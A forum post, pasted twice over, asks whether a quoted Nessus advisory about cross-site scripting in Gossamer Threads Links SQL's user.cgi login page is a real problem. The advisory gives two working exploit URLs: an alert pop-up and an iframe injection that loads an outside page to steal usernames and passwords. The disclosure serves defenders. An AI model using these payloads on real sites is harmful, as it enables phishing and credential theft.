Hello, is the following a problem really ?
I didn t find anything in the forum.
It s from http://www.nessus.org
The URL variable in the Gossamer Threads Links SQL login page (user.cgi) is a hidden \
field in the login form and can be passed directly to user.cgi in the form of \
user.cgi?url="xyz" The URL variable is client side input created by the browser when \
a user clicks on a link which requires authentication. After authentication the user \
is redirected to the URL in the URL variable. This URL variable does not \
sufficiently validate the client side input and is therefore vulnerable to script \
injection and cross site scripting (XSS) attacks.
Exploit
This is a standard XSS vulnerability.
Note an attacker would normally obfuscate the linking code but for these examples I \
have made it simple for the sake of understanding.
Simple Example 1 (Pop up)
/user.cgi?url="><script>alert("XSS Vulnerability")</script><"&from=rate
Resulting in the following within the HTML being injected:
<input type="hidden" name="url" value=""><script>alert("XSS \
Vulnerability")</script><"" />
Simple Example 2 (iframe to steal username and password)
/user.cgi?url="><iframe%20src="http://www.stationx.net/linksql.html"%20scrolling="No"% \
20align="MIDDLE"%20width="100%"%20height="3000"%20frameborder="No"></iframe><!--&from= \
rate regards
manne
http://www.edelsteine.de
I didn t find anything in the forum.
It s from http://www.nessus.org
The URL variable in the Gossamer Threads Links SQL login page (user.cgi) is a hidden \
field in the login form and can be passed directly to user.cgi in the form of \
user.cgi?url="xyz" The URL variable is client side input created by the browser when \
a user clicks on a link which requires authentication. After authentication the user \
is redirected to the URL in the URL variable. This URL variable does not \
sufficiently validate the client side input and is therefore vulnerable to script \
injection and cross site scripting (XSS) attacks.
Exploit
This is a standard XSS vulnerability.
Note an attacker would normally obfuscate the linking code but for these examples I \
have made it simple for the sake of understanding.
Simple Example 1 (Pop up)
/user.cgi?url="><script>alert("XSS Vulnerability")</script><"&from=rate
Resulting in the following within the HTML being injected:
<input type="hidden" name="url" value=""><script>alert("XSS \
Vulnerability")</script><"" />
Simple Example 2 (iframe to steal username and password)
/user.cgi?url="><iframe%20src="http://www.stationx.net/linksql.html"%20scrolling="No"% \
20align="MIDDLE"%20width="100%"%20height="3000"%20frameborder="No"></iframe><!--&from= \
rate regards
manne
http://www.edelsteine.de